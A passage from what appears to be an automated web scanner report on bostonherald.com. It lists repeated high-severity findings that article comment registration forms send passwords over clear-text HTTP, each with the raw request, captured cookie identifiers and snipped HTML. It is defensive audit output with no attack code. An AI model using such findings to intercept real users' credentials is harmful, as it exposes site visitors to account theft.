User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:07:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.14. http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:21:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 83414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.15. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.16. http://bostonherald.com/news/regional/view.bg  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/regional/view.bg?articleid=1294599&format=comments&srvc=news&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:14:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.17. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.18. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 87974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.19. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:17:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 85702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.20. http://bostonherald.com/sports/football/patriots/view.bg  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /sports/football/patriots/view.bg?articleid=1294646&format=comments&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:24:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.21. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:17:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 97568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.22. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:20:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 71939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.23. http://bostonherald.com/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:18:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.24. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:36:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 67975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.25. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

Issue detail

